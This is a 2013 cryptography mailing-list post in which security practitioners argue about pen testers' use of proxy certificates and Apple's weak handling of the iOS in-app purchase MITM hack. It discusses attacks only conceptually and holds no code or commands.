[cryptography] yet another certificate MITM attack

Jeffrey Walton noloader at gmail.com
Sat Jan 12 18:29:50 EST 2013

On Sat, Jan 12, 2013 at 6:11 PM, Kevin W. Wall <kevin.w.wall at gmail.com> wrote:
> On Sat, Jan 12, 2013 at 4:37 PM, Jeffrey Walton <noloader at gmail.com> wrote:
>> On Sat, Jan 12, 2013 at 2:35 PM, Kevin W. Wall <kevin.w.wall at gmail.com> wrote:
> [snip]
>>> Whoa...hold on there Jeff. I'm hoping that I'm misunderstanding your
>>> last statement about what the pen testers did to "destroy a secure
>>> channel".
>>> Are you implying that _authorized_ PenTesters using software such as
>>> BurpSuite (or Fiddler2 or Paros Proxy, or any other software that
>>> leverages the browser's _forward_ proxy ability is violation of some
>>> law or morals? If so, I would wholeheartedly disagree. They are not
>>> capturing arbitrary HTTPS traffic of others, but only that originating
>>> from their
>> http://arstechnica.com/security/2012/07/ios-in-app-purchase-service-hacked/.
>> In this case, the user trusted the certificate and took control of
>> infrastructure. The result: the developer possibly absorbed a
>> financial loss.
>> Note: there was no Jailbreak required, no re-engineering of the IPA
>> required, and no low-level debugging required. The user trusted a
>> proxy certificate and gave bad DNS answers through a server under
>> his/her control. That was it.
> Well, I think you made my point. This had nothing to do with "penetration
> testing" or Burp Suite (AFAICT; the YouTube video from cited URL taken
> down because of claims by Apple of *copyright* violations.)
> Furthermore, while all the details are not available, this does not seem to be
> using the same mechanisms (of browser's forward proxy) that Burp, Paros,
> Fiddler2, etc. normally use. They generally have you run the proxy on some
> localhost ports (8080 / 8443 are typical) and a self-signed certificate is
> usually used to the SSL port of the proxy.
No. You turn on WiFi and proxy the device's connection to your laptop
(been there, done that :) Burpe Suite even fixed an annoying bug over
the summer :)

> That doesn't mean that Borodin
> himself didn't use something like Burp or Paros to figure out how it all worked,
> but IMO, that's irrelevant to the whole pen testing angle.
I'm not picking on the pen testers. I claim its something they do with
nearly every pen test, and no one every raises a red flag - even the
folks who are supposed to raise the red flags.

> This is to be an
> illegal (well, maybe not in Russia) hack exploiting an Apple vulnerability.
> It most certainly is a violation of Apple's EULA and TOS.
Its not illegal (thanks Jon). DMCA proper (PUBLIC LAW 105–304) has
exceptions for reverse engineering and security testing and
evaluation. The RE exemption is in Section 1205 (f) REVERSE
ENGINEERING). The ST&E exemption is in Section 1205 (i) SECURITY

> I simply do not think it is fair to reference this specific case and then to
> characterize the general use of proxies by *authorized* pen testers as
> something illegal or immoral.
I'm not. That's why we engage the pen testers - to find what's broken
in clever ways (sometimes, not so clever).

I claim its sad that the security architects watch pen testers destroy
the secure channel and thought nothing of it. If that were my
application, or I was the architect responsible for the application, I
would be pissed and looking for ways to fix the hole. After all, we
*know* infrastructure is insecure.

>> BTW, Apple did not fix the failure with technical controls such as
>> public key pinning. Taking advantage of the pre-existing relation
>> between the develop and Apple (using 'a priori' knowledge) must have
>> been too secure (?).
>> Instead, Apple gave the developers instructions on how to verify a
>> purchase (i.e., implement this bit of PKI); and they sent their
>> lawyers to do a takedown. Double fail.

> I'm glad to see that you view this as a failure of Apple and not as
> something you are blaming on pen testers "destroying a secure
> communication channel" using something like BurpSuite. Whether or
A 'proper' solution would have been resilient to [expected] failures
in the infrastructure; and resilient to some failures in the platform.

That was not the case here, and the security architects did not raise
a red flag. That's a fail on the architects.

Apple software security is an absolute joke at times.

> not Borodin had make this exploit available to the masses, the vulnerability
> still exists. If he would have only reported this to Apple would they
> have addressed it?
Probably not. I reported items years ago that have not been fixed.
Apple's XML parser still suffered from a billion laughs over the
summer - I personally performed the tests (iOS 5.1.1). It took Apple
months to remove the toxic Diginotar certificates. It took Apple three
years to fix the FinFisher bug
Etc, etc, etc....

As I said, Apple software security is an absolute joke at times.


More information about the cryptography mailing list